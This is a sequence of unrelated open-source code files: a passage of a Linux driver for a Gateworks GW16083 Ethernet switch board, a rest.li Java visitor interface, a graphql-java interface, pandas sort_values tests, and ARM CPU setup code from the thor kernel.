priv = devm_kzalloc(&pdev->dev, sizeof(*priv), GFP_KERNEL); if (!priv) return -ENOMEM; memset(priv, 0, sizeof(*priv)); priv->phydev = pdev; priv->client = gw16083_client; priv->port5.port = 5; priv->port6.port = 6; dev_set_drvdata(&pdev->dev, priv); /* register sysfs API */ #if !IS_ENABLED(CONFIG_NET_DSA_MV88E6352) ret |= device_create_file(&pdev->dev, &dev_attr_lan1); ret |= device_create_file(&pdev->dev, &dev_attr_lan2); ret |= device_create_file(&pdev->dev, &dev_attr_lan3); ret |= device_create_file(&pdev->dev, &dev_attr_lan4); ret |= device_create_file(&pdev->dev, &dev_attr_lan5); ret |= device_create_file(&pdev->dev, &dev_attr_lan6); #endif ret |= device_create_file(&pdev->dev, &dev_attr_lan5_sfp); ret |= device_create_file(&pdev->dev, &dev_attr_lan6_sfp); ret |= device_create_file(&pdev->dev, &dev_attr_lan5_mode); ret |= device_create_file(&pdev->dev, &dev_attr_lan6_mode); if (unlikely(ret)) dev_err(&pdev->dev, "Failed creating attrs\n"); /* Add a nice symlink to the real device */ ret = sysfs_create_link(kernel_kobj, &pdev->dev.kobj, "gw16083"); INIT_DELAYED_WORK(&priv->work, mv88e6176_work); priv->workq = create_singlethread_workqueue("gw16083"); if (!priv->workq) return -ENODEV; queue_delayed_work(priv->workq, &priv->work, 0); dev_dbg(dev, "initial state: GPIO=0x%02x " "Port5_serdes=%d Port6_serdes=%d\n", read_switch_scratch(pdev, MV_GPIO_DATA), (read_switch_port_phy(pdev, 5, MII_M1111_PHY_EXT_SR) & (1<<13) ? 1:0), (read_switch_port_phy(pdev, 6, MII_M1111_PHY_EXT_SR) & (1<<13) ? 1:0)); return ret; } static struct phy_driver mv88e6176_phy_driver = { .name = "gw16083", .phy_id = MV_IDENT_VALUE, .phy_id_mask = MV_IDENT_MASK, .features = PHY_BASIC_FEATURES, .probe = &mv88e6176_probe, .remove = &mv88e6176_remove, .config_init = &mv88e6176_config_init, .config_aneg = &mv88e6176_config_aneg, .read_status = &mv88e6176_read_status, .driver = { .owner = THIS_MODULE }, }; /* * I2C driver */ /* See SFF-8472 */ struct sfp_msa { /* Basic ID fields */ u8 identifier; u8 ext_identifier; u8 connector; u8 transceiver[8]; u8 encoding; u8 br_nominal; u8 rate_identifier; u8 length_smf_km; u8 length_smf; u8 length_om2; u8 length_om1; u8 length_om4; u8 length_om3; u8 vendor_name[16]; u8 transceiver2; u8 vendor_oui[3]; u8 vendor_pn[16]; u8 vendor_rev[4]; u8 wavelength[2]; u8 resv1; u8 cc_base; /* extended id fields */ u8 options[2]; u8 br_max; u8 br_min; u8 vendor_sn[16]; u8 date_code[8]; u8 diags_type; u8 enhanced_options; u8 sff8472_compliance; u8 cc_ext; /* Vendor specific ID fields */ u8 vendor_data[32]; u8 sff8079[128]; }; enum identifier { UNKNOWN, GBIC, SFF, SFP, XBI, XENPACK, XFP, XFF, XFP_E, XPAK, X2, DWDM_SFP, QSFP, MAX_ID, }; const char* id_names[] = { "UNKONWN", "GBIC", "SFF", "SFP", NULL, }; /* Flags for SFP modules compatible with ETH up to 1Gb */ struct sfp_flags { u8 e1000_base_sx:1; u8 e1000_base_lx:1; u8 e1000_base_cx:1; u8 e1000_base_t:1; u8 e100_base_lx:1; u8 e100_base_fx:1; u8 e10_base_bx10:1; u8 e10_base_px:1; }; #define STRING_APPEND(str, src) \ strncat(str, src, sizeof(src)); \ for (i = 1; i < sizeof(str); i++) \ if (str[i-1] == ' ' && str[i] == ' ') \ str[i] = 0; static int gw16083_read_port_sfp(struct i2c_client *client, struct mv88e1111_port_state *state) { int ret = 0; u8 data[256]; struct sfp_flags *eth_flags; u8 crc; int i; u8 *str; struct sfp_msa *sfp_msa = (struct sfp_msa *)data; int port = state->port; union i2c_smbus_data d; dev_dbg(&client->dev, "%s Port%d\n", __func__, port); if (!i2c_check_functionality(client->adapter, I2C_FUNC_SMBUS_READ_I2C_BLOCK)) return -ENODEV; d.byte = (port == 5) ? 1 : 2; if (i2c_smbus_xfer(client->adapter, GW16083_I2C_ADDR_PCA9543, client->flags, I2C_SMBUS_WRITE, 0, I2C_SMBUS_BYTE_DATA, &d) < 0) { dev_err(&client->dev, "Port%d: failed writing PCA9543 register\n", port); return ret; } /* read all 256 bytes of SFP EEPROM */ for (i = 0; i < sizeof(data); i += I2C_SMBUS_BLOCK_MAX) { d.block[0] = I2C_SMBUS_BLOCK_MAX; if (i2c_smbus_xfer(client->adapter, GW16083_I2C_ADDR_SFP1, client->flags, I2C_SMBUS_READ, i, I2C_SMBUS_I2C_BLOCK_DATA, &d) < 0) { dev_err(&client->dev, "Port%d: failed reading SFP data\n", port); return ret; } memcpy(data + i, d.block + 1, I2C_SMBUS_BLOCK_MAX); } /* Validate checksums */ for (crc = 0, i = 0; i < 63; i++) crc += data[i]; if (crc != sfp_msa->cc_base) { dev_err(&client->dev, "Port%d: " "Checksum failure for Base ID fields: 0x%02x\n", port, crc); #ifdef FAIL_ON_CHECKSUM_ERR return -EINVAL; #endif } for (crc = 0, i = 64; i < 95; i++) crc += data[i]; if (crc != sfp_msa->cc_ext) { dev_err(&client->dev, "Port%d: " "Checksum failure for Extended ID fields: 0x%02x\n", port, crc); #ifdef FAIL_ON_CHECKSUM_ERR return -EINVAL; #endif } state->sfp_id[0] = 0; for (i = 0; id_names[i]; i++) { if (sfp_msa->identifier == i) { sprintf(state->sfp_id, "%s: ", id_names[i]); break; } } STRING_APPEND(state->sfp_id, sfp_msa->vendor_oui); STRING_APPEND(state->sfp_id, sfp_msa->vendor_name); STRING_APPEND(state->sfp_id, sfp_msa->vendor_pn); STRING_APPEND(state->sfp_id, sfp_msa->vendor_rev); STRING_APPEND(state->sfp_id, sfp_msa->vendor_sn); dev_info(&client->dev, "Port%d: %s\n", port, state->sfp_id); if ((sfp_msa->identifier != GBIC) && (sfp_msa->identifier != SFF) && (sfp_msa->identifier != SFP)) { dev_err(&client->dev, "Port%d: Unknown module identifier: %d\n", port, sfp_msa->identifier); return -EINVAL; } str = ""; eth_flags = (struct sfp_flags *)(sfp_msa->transceiver + 3); if (eth_flags->e1000_base_sx) { str = "1000Base-SX (Fiber)"; } else if (eth_flags->e1000_base_lx) { str = "1000Base-LX (Fiber)"; } else if (eth_flags->e1000_base_t) { str = "1000Base-T (Copper)"; } else if (eth_flags->e100_base_fx) { str = "100Base-FX (Fiber) - not supported"; ret = -EINVAL; } else { str = "Unknown/Unsupported media type"; ret = -EINVAL; } if (ret) dev_err(&client->dev, "Port%d: %s (0x%02x)\n", port, str, sfp_msa->transceiver[3]); else dev_info(&client->dev, "Port%d: %s (0x%02x)\n", port, str, sfp_msa->transceiver[3]); return ret; } static int gw16083_probe(struct i2c_client *client, const struct i2c_device_id *id) { int ret; dev_info(&client->dev, "GW16083 Ethernet Expansion Mezzanine\n"); if (gw16083_client) { dev_err(&client->dev, "client already registered\n"); return -EINVAL; } gw16083_client = client; ret = phy_driver_register(&mv88e6176_phy_driver); if (ret) dev_err(&client->dev, "failed to register mv88e6176 phy driver: %d\n", ret); return ret; } static int gw16083_remove(struct i2c_client *client) { dev_dbg(&client->dev, "%s\n", __func__); phy_driver_unregister(&mv88e6176_phy_driver); gw16083_client = NULL; return 0; } static const struct of_device_id gw16083_dt_ids[] = { { .compatible = "gateworks,gw16083", }, { } }; MODULE_DEVICE_TABLE(of, gw16083_dt_ids); static const struct i2c_device_id gw16083_id[] = { { "gw16083", 0 }, { } }; MODULE_DEVICE_TABLE(i2c, gw16083_id); static struct i2c_driver gw16083_driver = { .driver = { .name = "gw16083", .of_match_table = gw16083_dt_ids, }, .probe = gw16083_probe, .remove = gw16083_remove, .id_table = gw16083_id, }; static int __init mv88e6176_init(void) { return i2c_add_driver(&gw16083_driver); } static void __exit mv88e6176_exit(void) { i2c_del_driver(&gw16083_driver); } module_init(mv88e6176_init); module_exit(mv88e6176_exit);
12,810
1,682
<reponame>haroldl/rest.li<gh_stars>1000+ /* Copyright (c) 2012 LinkedIn Corp. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package com.linkedin.restli.docgen; import com.linkedin.data.template.RecordTemplate; import com.linkedin.restli.restspec.ActionSchema; import com.linkedin.restli.restspec.ActionsSetSchema; import com.linkedin.restli.restspec.AssociationSchema; import com.linkedin.restli.restspec.BatchFinderSchema; import com.linkedin.restli.restspec.CollectionSchema; import com.linkedin.restli.restspec.EntitySchema; import com.linkedin.restli.restspec.FinderSchema; import com.linkedin.restli.restspec.ParameterSchema; import com.linkedin.restli.restspec.ResourceSchema; import com.linkedin.restli.restspec.RestMethodSchema; import com.linkedin.restli.restspec.SimpleSchema; import com.linkedin.restli.server.ResourceLevel; import java.util.List; /** * Visits various features of a REST resource hierarchy. The hierarchy is formed * from disparate resource types, each of which has common method types, such as * rest methods, finders and actions. * * @author dellamag */ public interface ResourceSchemaVisitior { /** * Callback function when the visitor visits a {@link ResourceSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param resourceSchema resource being visited */ void visitResourceSchema(VisitContext visitContext, ResourceSchema resourceSchema); /** * Callback function when the visitor visits a {@link CollectionSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param collectionSchema collection being visited */ void visitCollectionResource(VisitContext visitContext, CollectionSchema collectionSchema); /** * Callback function when the visitor visits a {@link AssociationSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param associationSchema association being visited */ void visitAssociationResource(VisitContext visitContext, AssociationSchema associationSchema); /** * Callback function when the visitor visits a {@link SimpleSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param simpleSchema simple being visited */ void visitSimpleResource(VisitContext visitContext, SimpleSchema simpleSchema); /** * Callback function when the visitor visits a {@link ActionsSetSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param actionSetSchema action set being visited */ void visitActionSetResource(VisitContext visitContext, ActionsSetSchema actionSetSchema); /** * Callback function when the visitor visits a {@link EntitySchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param entitySchema entity being visited */ void visitEntityResource(VisitContext visitContext, EntitySchema entitySchema); /** * Callback function when the visitor visits a {@link RestMethodSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema} * @param restMethodSchema REST method being visited, e.g. GET, POST, BATCH_GET, etc */ void visitRestMethod(VisitContext visitContext, RecordTemplate parentResource, RestMethodSchema restMethodSchema); /** * Callback function when the visitor visits a {@link FinderSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema} * @param finderSchema finder being visited */ void visitFinder(VisitContext visitContext, RecordTemplate parentResource, FinderSchema finderSchema); /** * Callback function when the visitor visits a {@link BatchFinderSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema} * @param batchFinderSchema batchfinder being visited */ void visitBatchFinder(VisitContext visitContext, RecordTemplate parentResource, BatchFinderSchema batchFinderSchema); /** * Callback function when the visitor visits a {@link ActionSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema} * @param resourceLevel {@link ResourceLevel} of the action * @param actionSchema action being visited */ void visitAction(VisitContext visitContext, RecordTemplate parentResource, ResourceLevel resourceLevel, ActionSchema actionSchema); /** * Callback function when the visitor visits a {@link ParameterSchema}. * * @param visitContext hierarchy of all parent resource schemas (root is the first element) * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema} * @param parentMethodSchema can be any of {@link RestMethodSchema}, {@link ActionSchema} or {@link FinderSchema} * @param parameterSchema parameter to be visited */ void visitParameter(VisitContext visitContext, RecordTemplate parentResource, Object parentMethodSchema, ParameterSchema parameterSchema); /** * Context data passed between visit callbacks. */ static class VisitContext { /** * @param resourceSchemaHierarchy list of {@link ResourceSchema} that the visitor has traversed * @param resourcePath path of the resource */ public VisitContext(List<ResourceSchema> resourceSchemaHierarchy, String resourcePath) { _resourceSchemaHierarchy = resourceSchemaHierarchy; _resourcePath = resourcePath; } /** * @return list of {@link ResourceSchema} that the visitor has traversed */ public List<ResourceSchema> getResourceSchemaHierarchy() { return _resourceSchemaHierarchy; } /** * @return path of the resource */ public String getResourcePath() { return _resourcePath; } /** * @return the most recently visited {@link ResourceSchema} */ public ResourceSchema getParentSchema() { return _resourceSchemaHierarchy.get(_resourceSchemaHierarchy.size() - 1); } private final List<ResourceSchema> _resourceSchemaHierarchy; private final String _resourcePath; } }
2,545
5,355
package graphql.language; import graphql.PublicApi; /** * Represents a node that can contain a description. */ @PublicApi public interface DescribedNode<T extends Node> extends Node<T> { /** * @return the description of this node */ Description getDescription(); }
91
28,899
import numpy as np import pytest from pandas import ( DatetimeIndex, Index, NaT, PeriodIndex, TimedeltaIndex, timedelta_range, ) import pandas._testing as tm def check_freq_ascending(ordered, orig, ascending): """ Check the expected freq on a PeriodIndex/DatetimeIndex/TimedeltaIndex when the original index is generated (or generate-able) with period_range/date_range/timedelta_range. """ if isinstance(ordered, PeriodIndex): assert ordered.freq == orig.freq elif isinstance(ordered, (DatetimeIndex, TimedeltaIndex)): if ascending: assert ordered.freq.n == orig.freq.n else: assert ordered.freq.n == -1 * orig.freq.n def check_freq_nonmonotonic(ordered, orig): """ Check the expected freq on a PeriodIndex/DatetimeIndex/TimedeltaIndex when the original index is _not_ generated (or generate-able) with period_range/date_range//timedelta_range. """ if isinstance(ordered, PeriodIndex): assert ordered.freq == orig.freq elif isinstance(ordered, (DatetimeIndex, TimedeltaIndex)): assert ordered.freq is None class TestSortValues: @pytest.fixture(params=[DatetimeIndex, TimedeltaIndex, PeriodIndex]) def non_monotonic_idx(self, request): if request.param is DatetimeIndex: return DatetimeIndex(["2000-01-04", "2000-01-01", "2000-01-02"]) elif request.param is PeriodIndex: dti = DatetimeIndex(["2000-01-04", "2000-01-01", "2000-01-02"]) return dti.to_period("D") else: return TimedeltaIndex( ["1 day 00:00:05", "1 day 00:00:01", "1 day 00:00:02"] ) def test_argmin_argmax(self, non_monotonic_idx): assert non_monotonic_idx.argmin() == 1 assert non_monotonic_idx.argmax() == 0 def test_sort_values(self, non_monotonic_idx): idx = non_monotonic_idx ordered = idx.sort_values() assert ordered.is_monotonic ordered = idx.sort_values(ascending=False) assert ordered[::-1].is_monotonic ordered, dexer = idx.sort_values(return_indexer=True) assert ordered.is_monotonic tm.assert_numpy_array_equal(dexer, np.array([1, 2, 0], dtype=np.intp)) ordered, dexer = idx.sort_values(return_indexer=True, ascending=False) assert ordered[::-1].is_monotonic tm.assert_numpy_array_equal(dexer, np.array([0, 2, 1], dtype=np.intp)) def check_sort_values_with_freq(self, idx): ordered = idx.sort_values() tm.assert_index_equal(ordered, idx) check_freq_ascending(ordered, idx, True) ordered = idx.sort_values(ascending=False) expected = idx[::-1] tm.assert_index_equal(ordered, expected) check_freq_ascending(ordered, idx, False) ordered, indexer = idx.sort_values(return_indexer=True) tm.assert_index_equal(ordered, idx) tm.assert_numpy_array_equal(indexer, np.array([0, 1, 2], dtype=np.intp)) check_freq_ascending(ordered, idx, True) ordered, indexer = idx.sort_values(return_indexer=True, ascending=False) expected = idx[::-1] tm.assert_index_equal(ordered, expected) tm.assert_numpy_array_equal(indexer, np.array([2, 1, 0], dtype=np.intp)) check_freq_ascending(ordered, idx, False) @pytest.mark.parametrize("freq", ["D", "H"]) def test_sort_values_with_freq_timedeltaindex(self, freq): # GH#10295 idx = timedelta_range(start=f"1{freq}", periods=3, freq=freq).rename("idx") self.check_sort_values_with_freq(idx) @pytest.mark.parametrize( "idx", [ DatetimeIndex( ["2011-01-01", "2011-01-02", "2011-01-03"], freq="D", name="idx" ), DatetimeIndex( ["2011-01-01 09:00", "2011-01-01 10:00", "2011-01-01 11:00"], freq="H", name="tzidx", tz="Asia/Tokyo", ), ], ) def test_sort_values_with_freq_datetimeindex(self, idx): self.check_sort_values_with_freq(idx) @pytest.mark.parametrize("freq", ["D", "2D", "4D"]) def test_sort_values_with_freq_periodindex(self, freq): # here with_freq refers to being period_range-like idx = PeriodIndex( ["2011-01-01", "2011-01-02", "2011-01-03"], freq=freq, name="idx" ) self.check_sort_values_with_freq(idx) @pytest.mark.parametrize( "idx", [ PeriodIndex(["2011", "2012", "2013"], name="pidx", freq="A"), Index([2011, 2012, 2013], name="idx"), # for compatibility check ], ) def test_sort_values_with_freq_periodindex2(self, idx): # here with_freq indicates this is period_range-like self.check_sort_values_with_freq(idx) def check_sort_values_without_freq(self, idx, expected): ordered = idx.sort_values(na_position="first") tm.assert_index_equal(ordered, expected) check_freq_nonmonotonic(ordered, idx) if not idx.isna().any(): ordered = idx.sort_values() tm.assert_index_equal(ordered, expected) check_freq_nonmonotonic(ordered, idx) ordered = idx.sort_values(ascending=False) tm.assert_index_equal(ordered, expected[::-1]) check_freq_nonmonotonic(ordered, idx) ordered, indexer = idx.sort_values(return_indexer=True, na_position="first") tm.assert_index_equal(ordered, expected) exp = np.array([0, 4, 3, 1, 2], dtype=np.intp) tm.assert_numpy_array_equal(indexer, exp) check_freq_nonmonotonic(ordered, idx) if not idx.isna().any(): ordered, indexer = idx.sort_values(return_indexer=True) tm.assert_index_equal(ordered, expected) exp = np.array([0, 4, 3, 1, 2], dtype=np.intp) tm.assert_numpy_array_equal(indexer, exp) check_freq_nonmonotonic(ordered, idx) ordered, indexer = idx.sort_values(return_indexer=True, ascending=False) tm.assert_index_equal(ordered, expected[::-1]) exp = np.array([2, 1, 3, 0, 4], dtype=np.intp) tm.assert_numpy_array_equal(indexer, exp) check_freq_nonmonotonic(ordered, idx) def test_sort_values_without_freq_timedeltaindex(self): # GH#10295 idx = TimedeltaIndex( ["1 hour", "3 hour", "5 hour", "2 hour ", "1 hour"], name="idx1" ) expected = TimedeltaIndex( ["1 hour", "1 hour", "2 hour", "3 hour", "5 hour"], name="idx1" ) self.check_sort_values_without_freq(idx, expected) @pytest.mark.parametrize( "index_dates,expected_dates", [ ( ["2011-01-01", "2011-01-03", "2011-01-05", "2011-01-02", "2011-01-01"], ["2011-01-01", "2011-01-01", "2011-01-02", "2011-01-03", "2011-01-05"], ), ( ["2011-01-01", "2011-01-03", "2011-01-05", "2011-01-02", "2011-01-01"], ["2011-01-01", "2011-01-01", "2011-01-02", "2011-01-03", "2011-01-05"], ), ( [NaT, "2011-01-03", "2011-01-05", "2011-01-02", NaT], [NaT, NaT, "2011-01-02", "2011-01-03", "2011-01-05"], ), ], ) def test_sort_values_without_freq_datetimeindex( self, index_dates, expected_dates, tz_naive_fixture ): tz = tz_naive_fixture # without freq idx = DatetimeIndex(index_dates, tz=tz, name="idx") expected = DatetimeIndex(expected_dates, tz=tz, name="idx") self.check_sort_values_without_freq(idx, expected) @pytest.mark.parametrize( "idx,expected", [ ( PeriodIndex( [ "2011-01-01", "2011-01-03", "2011-01-05", "2011-01-02", "2011-01-01", ], freq="D", name="idx1", ), PeriodIndex( [ "2011-01-01", "2011-01-01", "2011-01-02", "2011-01-03", "2011-01-05", ], freq="D", name="idx1", ), ), ( PeriodIndex( [ "2011-01-01", "2011-01-03", "2011-01-05", "2011-01-02", "2011-01-01", ], freq="D", name="idx2", ), PeriodIndex( [ "2011-01-01", "2011-01-01", "2011-01-02", "2011-01-03", "2011-01-05", ], freq="D", name="idx2", ), ), ( PeriodIndex( [NaT, "2011-01-03", "2011-01-05", "2011-01-02", NaT], freq="D", name="idx3", ), PeriodIndex( [NaT, NaT, "2011-01-02", "2011-01-03", "2011-01-05"], freq="D", name="idx3", ), ), ( PeriodIndex( ["2011", "2013", "2015", "2012", "2011"], name="pidx", freq="A" ), PeriodIndex( ["2011", "2011", "2012", "2013", "2015"], name="pidx", freq="A" ), ), ( # For compatibility check Index([2011, 2013, 2015, 2012, 2011], name="idx"), Index([2011, 2011, 2012, 2013, 2015], name="idx"), ), ], ) def test_sort_values_without_freq_periodindex(self, idx, expected): # here without_freq means not generateable by period_range self.check_sort_values_without_freq(idx, expected) def test_sort_values_without_freq_periodindex_nat(self): # doesn't quite fit into check_sort_values_without_freq idx = PeriodIndex(["2011", "2013", "NaT", "2011"], name="pidx", freq="D") expected = PeriodIndex(["NaT", "2011", "2011", "2013"], name="pidx", freq="D") ordered = idx.sort_values(na_position="first") tm.assert_index_equal(ordered, expected) check_freq_nonmonotonic(ordered, idx) ordered = idx.sort_values(ascending=False) tm.assert_index_equal(ordered, expected[::-1]) check_freq_nonmonotonic(ordered, idx) def test_order_stability_compat(): # GH#35922. sort_values is stable both for normal and datetime-like Index pidx = PeriodIndex(["2011", "2013", "2015", "2012", "2011"], name="pidx", freq="A") iidx = Index([2011, 2013, 2015, 2012, 2011], name="idx") ordered1, indexer1 = pidx.sort_values(return_indexer=True, ascending=False) ordered2, indexer2 = iidx.sort_values(return_indexer=True, ascending=False) tm.assert_numpy_array_equal(indexer1, indexer2)
6,102
935
<gh_stars>100-1000 #include <thor-internal/arch/cpu.hpp> #include <generic/thor-internal/cpu-data.hpp> #include <frg/manual_box.hpp> #include <thor-internal/main.hpp> #include <thor-internal/kasan.hpp> #include <thor-internal/fiber.hpp> namespace thor { extern "C" void saveFpSimdRegisters(FpRegisters *frame); extern "C" void restoreFpSimdRegisters(FpRegisters *frame); bool FaultImageAccessor::allowUserPages() { return true; } void UserContext::deactivate() { } UserContext::UserContext() : kernelStack(UniqueKernelStack::make()) { } void UserContext::migrate(CpuData *cpu_data) { assert(!intsAreEnabled()); cpu_data->exceptionStackPtr = kernelStack.basePtr(); } FiberContext::FiberContext(UniqueKernelStack stack) : stack{std::move(stack)} { } extern "C" [[ noreturn ]] void _restoreExecutorRegisters(void *pointer); [[noreturn]] void restoreExecutor(Executor *executor) { getCpuData()->currentDomain = static_cast<uint64_t>(executor->general()->domain); getCpuData()->exceptionStackPtr = executor->_exceptionStack; restoreFpSimdRegisters(&executor->general()->fp); _restoreExecutorRegisters(executor->general()); } size_t Executor::determineSize() { return sizeof(Frame); } Executor::Executor() : _pointer{nullptr}, _exceptionStack{nullptr} { } Executor::Executor(UserContext *context, AbiParameters abi) { _pointer = static_cast<char *>(kernelAlloc->allocate(getStateSize())); memset(_pointer, 0, getStateSize()); general()->elr = abi.ip; general()->sp = abi.sp; general()->spsr = 0; general()->domain = Domain::user; _exceptionStack = context->kernelStack.basePtr(); } Executor::Executor(FiberContext *context, AbiParameters abi) : _exceptionStack{nullptr} { _pointer = static_cast<char *>(kernelAlloc->allocate(getStateSize())); memset(_pointer, 0, getStateSize()); general()->elr = abi.ip; general()->sp = (uintptr_t)context->stack.basePtr(); general()->x[0] = abi.argument; general()->spsr = 5; general()->domain = Domain::fiber; } Executor::~Executor() { kernelAlloc->free(_pointer); } void saveExecutor(Executor *executor, FaultImageAccessor accessor) { for (int i = 0; i < 31; i++) executor->general()->x[i] = accessor._frame()->x[i]; executor->general()->elr = accessor._frame()->elr; executor->general()->spsr = accessor._frame()->spsr; executor->general()->domain = accessor._frame()->domain; executor->general()->sp = accessor._frame()->sp; executor->general()->tpidr_el0 = accessor._frame()->tpidr_el0; saveFpSimdRegisters(&executor->general()->fp); } void saveExecutor(Executor *executor, IrqImageAccessor accessor) { for (int i = 0; i < 31; i++) executor->general()->x[i] = accessor._frame()->x[i]; executor->general()->elr = accessor._frame()->elr; executor->general()->spsr = accessor._frame()->spsr; executor->general()->domain = accessor._frame()->domain; executor->general()->sp = accessor._frame()->sp; executor->general()->tpidr_el0 = accessor._frame()->tpidr_el0; saveFpSimdRegisters(&executor->general()->fp); } void saveExecutor(Executor *executor, SyscallImageAccessor accessor) { for (int i = 0; i < 31; i++) executor->general()->x[i] = accessor._frame()->x[i]; executor->general()->elr = accessor._frame()->elr; executor->general()->spsr = accessor._frame()->spsr; executor->general()->domain = accessor._frame()->domain; executor->general()->sp = accessor._frame()->sp; executor->general()->tpidr_el0 = accessor._frame()->tpidr_el0; saveFpSimdRegisters(&executor->general()->fp); } extern "C" void workStub(); void workOnExecutor(Executor *executor) { auto sp = reinterpret_cast<uint64_t *>(executor->getExceptionStack()); auto push = [&] (uint64_t v) { sp -= 2; memcpy(sp, &v, 8); }; assert(executor->general()->domain == Domain::user); assert(getCpuData()->currentDomain != static_cast<uint64_t>(Domain::user)); push(static_cast<uint64_t>(executor->general()->domain)); push(executor->general()->sp); push(executor->general()->elr); push(executor->general()->spsr); void *stub = reinterpret_cast<void *>(&workStub); executor->general()->domain = Domain::fault; executor->general()->elr = reinterpret_cast<uintptr_t>(stub); executor->general()->sp = reinterpret_cast<uintptr_t>(sp); executor->general()->spsr = 0x3c5; } void scrubStack(FaultImageAccessor accessor, Continuation cont) { scrubStackFrom(reinterpret_cast<uintptr_t>(accessor.frameBase()), cont);; } void scrubStack(IrqImageAccessor accessor, Continuation cont) { scrubStackFrom(reinterpret_cast<uintptr_t>(accessor.frameBase()), cont);; } void scrubStack(SyscallImageAccessor accessor, Continuation cont) { scrubStackFrom(reinterpret_cast<uintptr_t>(accessor.frameBase()), cont);; } void scrubStack(Executor *executor, Continuation cont) { scrubStackFrom(reinterpret_cast<uintptr_t>(*executor->sp()), cont); } size_t getStateSize() { return Executor::determineSize(); } void switchExecutor(smarter::borrowed_ptr<Thread> thread) { assert(!intsAreEnabled()); getCpuData()->activeExecutor = thread; } smarter::borrowed_ptr<Thread> activeExecutor() { return getCpuData()->activeExecutor; } PlatformCpuData::PlatformCpuData() { for(int i = 0; i < maxAsid; i++) asidBindings[i].setupAsid(i); } // TODO: support PAN? void enableUserAccess() { } void disableUserAccess() { } bool handleUserAccessFault(uintptr_t address, bool write, FaultImageAccessor accessor) { if(inHigherHalf(address)) return false; auto uar = getCpuData()->currentUar; if(!uar) return false; auto ip = *accessor.ip(); if(!(ip >= reinterpret_cast<uintptr_t>(uar->startIp) && ip < reinterpret_cast<uintptr_t>(uar->endIp))) return false; if(write) { if(!(uar->flags & uarWrite)) return false; }else{ if(!(uar->flags & uarRead)) return false; } *accessor.ip() = reinterpret_cast<Word>(uar->faultIp); return true; } void doRunOnStack(void (*function) (void *, void *), void *sp, void *argument) { assert(!intsAreEnabled()); cleanKasanShadow(reinterpret_cast<std::byte *>(sp) - UniqueKernelStack::kSize, UniqueKernelStack::kSize); asm volatile ( "\tmov x28, sp\n" "\tmov x1, sp\n" "\tmov x0, %0\n" "\tmov sp, %2\n" "\tblr %1\n" "\tmov sp, x28\n" : : "r" (argument), "r" (function), "r" (sp) : "x30", "x28", "x1", "x0", "memory"); } Error getEntropyFromCpu(void *buffer, size_t size) { return Error::noHardwareSupport; } namespace { frg::manual_box<frg::vector<CpuData *, KernelAlloc>> allCpuContexts; } int getCpuCount() { return allCpuContexts->size(); } CpuData *getCpuData(size_t k) { return (*allCpuContexts)[k]; } frg::manual_box<CpuData> staticBootCpuContext; void setupCpuContext(AssemblyCpuData *context) { context->selfPointer = context; asm volatile("msr tpidr_el1, %0" :: "r"(context)); } void setupBootCpuContext() { staticBootCpuContext.initialize(); setupCpuContext(staticBootCpuContext.get()); } static initgraph::Task initBootProcessorTask{&globalInitEngine, "arm.init-boot-processor", initgraph::Entails{getBootProcessorReadyStage()}, [] { allCpuContexts.initialize(*kernelAlloc); infoLogger() << "Booting on CPU #0" << frg::endlog; initializeThisProcessor(); } }; initgraph::Stage *getBootProcessorReadyStage() { static initgraph::Stage s{&globalInitEngine, "arm.boot-processor-ready"}; return &s; } initgraph::Edge bootProcessorReadyEdge{ getBootProcessorReadyStage(), getFibersAvailableStage() }; void initializeThisProcessor() { auto cpu_data = getCpuData(); // Enable FPU asm volatile ("msr cpacr_el1, %0" :: "r"(uint64_t(0b11 << 20))); // Enable access to cache info register and cache maintenance instructions uint64_t sctlr; asm volatile ("mrs %0, sctlr_el1" : "=r"(sctlr)); sctlr |= (uint64_t(1) << 14); sctlr |= (uint64_t(1) << 15); sctlr |= (uint64_t(1) << 26); asm volatile ("msr sctlr_el1, %0" :: "r"(sctlr)); cpu_data->cpuIndex = allCpuContexts->size(); allCpuContexts->push(cpu_data); cpu_data->irqStack = UniqueKernelStack::make(); cpu_data->detachedStack = UniqueKernelStack::make(); cpu_data->idleStack = UniqueKernelStack::make(); cpu_data->irqStackPtr = cpu_data->irqStack.basePtr(); cpu_data->wqFiber = KernelFiber::post([] { // Do nothing. Our only purpose is to run the associated work queue. }); cpu_data->generalWorkQueue = cpu_data->wqFiber->associatedWorkQueue()->selfPtr.lock(); assert(cpu_data->generalWorkQueue); } } // namespace thor
3,204
7,158
